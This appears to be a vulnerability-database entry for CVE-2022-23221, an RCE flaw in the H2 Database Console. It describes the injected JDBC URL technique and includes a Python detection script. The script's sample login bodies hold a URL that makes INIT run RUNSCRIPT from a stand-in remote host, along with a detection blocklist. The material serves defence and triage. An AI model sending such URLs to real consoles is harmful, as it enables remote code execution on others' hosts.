Cyber Resilience

CVE-2022-23221

Critical · Public PoC

Published: 19 January 2022

Modified: 05 May 2025
KEV Added: not listed
Patch: available (H2 2.1.210)
CVSS v3.1: 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
EPSS: 0.2657 (96.5th percentile)
Risk Priority: 36 (weighted 60% EPSS, 20% KEV, 20% CVSS)

Summary

CVE-2022-23221 is a critical-severity Argument Injection (CWE-88) vulnerability in the web console of the H2 Database Engine (h2database/h2), which is also shipped as a Debian Linux package and bundled in Oracle Communications Cloud Native Core Console. Its CVSS v3.1 base score is 9.8 (Critical).

Operationally, its EPSS score places it in the top 3.5% of CVEs by exploit likelihood; it is not currently listed in the CISA KEV catalog; a public proof-of-concept is referenced.

Deeper analysis

The vulnerability affects the H2 Console in H2 versions before 2.1.210 and stems from insufficient validation of the JDBC connection URL accepted on the console's login page. The console hands that URL to the H2 driver, which interprets any ;KEY=VALUE settings appended to it. An attacker can therefore submit an in-memory URL of the form jdbc:h2:mem:<name>;IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;INIT=RUNSCRIPT FROM '<script location>': FORBID_CREATION=FALSE permits creating a new database, IGNORE_UNKNOWN_SETTINGS=TRUE suppresses errors for unexpected settings, and INIT executes the given SQL when the connection is opened, with RUNSCRIPT loading that SQL from an attacker-chosen path or URL. Because H2 SQL can define Java-backed functions (CREATE ALIAS), a script executed this way yields arbitrary code execution in the console's JVM. The issue is tracked as CWE-88 (Argument Injection) and carries a CVSS 3.1 base score of 9.8.

An unauthenticated remote attacker who can reach the H2 Console exploits the flaw by submitting the malicious JDBC URL through the login form; no credentials for an existing database and no user interaction are required, and the result is full compromise of the confidentiality, integrity, and availability of the host running the console. Exposure therefore hinges on reachability: the standalone console accepts connections from other hosts only when started with -webAllowOthers, but deployments that embed the console inside a web application can expose it more widely.
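The following is an added example for this page, not code from the H2 project or from the referenced proof-of-concept. It parses an H2 JDBC URL into its settings (honouring H2's backslash escape for semicolons inside INIT), grades the URL on behaviour rather than on the literal NVD substring, so reordered, lower-cased or partial variants still trigger, and runs that check over constructed H2 Console login POST bodies. The `url`/`user`/`password` field names follow the console's login form but the exact wire format is an assumption; the bodies and the 192.0.2.10 address are constructed. An allowlist counterpart (`is_allowed`) shows the shape of a preventive check.

```python
"""
Triage of H2 JDBC URLs for the CVE-2022-23221 injection pattern.

Added example for this page, not H2 project code. The login-body samples
are constructed; field names (url, user, password) follow the H2 Console
login form, but the exact wire format is an assumption.
"""
import re
from urllib.parse import parse_qs


def split_settings(url: str) -> list[str]:
    """Split an H2 URL on ';', honouring H2's '\\;' escape for a literal ';'
    (used to chain statements inside INIT). The escape is collapsed so
    downstream matching sees the real statement text."""
    parts, buf, i = [], [], 0
    while i < len(url):
        ch = url[i]
        if ch == "\\" and i + 1 < len(url) and url[i + 1] == ";":
            buf.append(";")
            i += 2
            continue
        if ch == ";":
            parts.append("".join(buf))
            buf = []
        else:
            buf.append(ch)
        i += 1
    parts.append("".join(buf))
    return parts


def parse_h2_url(url: str) -> tuple[str, dict[str, str]]:
    """Return (base, settings). H2 setting names are case-insensitive, so
    keys are uppercased; values keep their original text."""
    parts = split_settings(url.strip())
    settings: dict[str, str] = {}
    for part in parts[1:]:
        if not part.strip():
            continue
        key, _, value = part.partition("=")
        settings[key.strip().upper()] = value.strip()
    return parts[0], settings


def assess(url: str) -> dict:
    """Grade a JDBC URL: INIT runs SQL at connect time (high); RUNSCRIPT
    inside INIT pulls a script from a path or URL (critical); the two
    helper settings alone are suspicious but not sufficient (medium)."""
    base, settings = parse_h2_url(url)
    findings: list[str] = []
    severity = "none"
    if settings.get("FORBID_CREATION", "").upper() == "FALSE":
        findings.append("FORBID_CREATION=FALSE lets the caller create a new database")
        severity = "medium"
    if settings.get("IGNORE_UNKNOWN_SETTINGS", "").upper() == "TRUE":
        findings.append("IGNORE_UNKNOWN_SETTINGS=TRUE hides errors for unexpected settings")
        severity = "medium"
    init = settings.get("INIT")
    if init is not None:
        findings.append("INIT executes SQL when the connection opens")
        severity = "high"
        if re.search(r"\bRUNSCRIPT\b", init, re.IGNORECASE):
            findings.append("INIT uses RUNSCRIPT: script loaded and executed at connect time")
            severity = "critical"
    return {"base": base, "settings": settings, "severity": severity, "findings": findings}


def is_allowed(url: str, allowed_settings: frozenset[str] = frozenset()) -> bool:
    """Preventive counterpart: accept a URL only if every setting is on the
    allowlist. With the default empty allowlist any ';KEY=VALUE' is rejected."""
    _, settings = parse_h2_url(url)
    return set(settings) <= allowed_settings


def triage_login_bodies(bodies: list[str]) -> list[tuple[int, str, str]]:
    """Run assess() over URL-encoded console login POST bodies and return
    (index, severity, base) for every body graded above 'none'."""
    hits = []
    for i, body in enumerate(bodies):
        form = parse_qs(body, keep_blank_values=True)
        for url in form.get("url", []):
            result = assess(url)
            if result["severity"] != "none":
                hits.append((i, result["severity"], result["base"]))
    return hits


# Constructed samples; 192.0.2.10 is a documentation address (RFC 5737).
SAMPLE_BODIES = [
    "url=jdbc%3Ah2%3A~%2Ftest&user=sa&password=",
    "url=jdbc%3Ah2%3Amem%3Ax%3BIGNORE_UNKNOWN_SETTINGS%3DTRUE%3BFORBID_CREATION%3DFALSE"
    "%3BINIT%3DRUNSCRIPT+FROM+%27http%3A%2F%2F192.0.2.10%2Fpoc.sql%27&user=sa&password=",
    "url=jdbc%3Ah2%3Amem%3Ax%3Binit%3Drunscript+from+%27%2Ftmp%2Fpoc.sql%27&user=sa&password=",
    "url=jdbc%3Ah2%3Amem%3Ax%3BFORBID_CREATION%3DFALSE&user=sa&password=",
]

if __name__ == "__main__":
    for idx, sev, base in triage_login_bodies(SAMPLE_BODIES):
        print(f"body[{idx}] {sev:8} {base}")
```

The blocklist in `assess` is for detection and triage of request logs; it is not a substitute for upgrading, since any setting that executes SQL or loads code is a candidate for abuse. `is_allowed` shows the inverse approach a front-end or proxy can enforce: refuse any settings suffix that is not explicitly permitted.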

The H2 project addressed the issue in release 2.1.210, with corresponding updates published through its GitHub security advisories and release notes. Debian subsequently issued patched packages for affected LTS distributions.

The EPSS score has held at its peak of 0.2657 since disclosure, indicating no material increase in observed exploitation interest.

Vulnerability details

H2 Console before 2.1.210 allows remote attackers to execute arbitrary code via a jdbc:h2:mem JDBC URL containing the IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;INIT=RUNSCRIPT substring, a different vulnerability than CVE-2021-42392.

CWE(s)

CWE-88: Improper Neutralization of Argument Delimiters in a Command ('Argument Injection')

Related Threats

No named actor attribution. No ATT&CK technique mapping is available for this CVE yet.

Affected Assets

h2database / h2: 1.1.100 through 2.0.206
debian / debian linux: 9.0, 10.0, 11.0
oracle / communications cloud native core console: 1.9.0

Mitigating Controls

No mitigating controls have been mapped for this CVE yet. From the analysis above: upgrade H2 to 2.1.210 or later (or install the patched Debian package), and do not expose the H2 Console to untrusted networks.
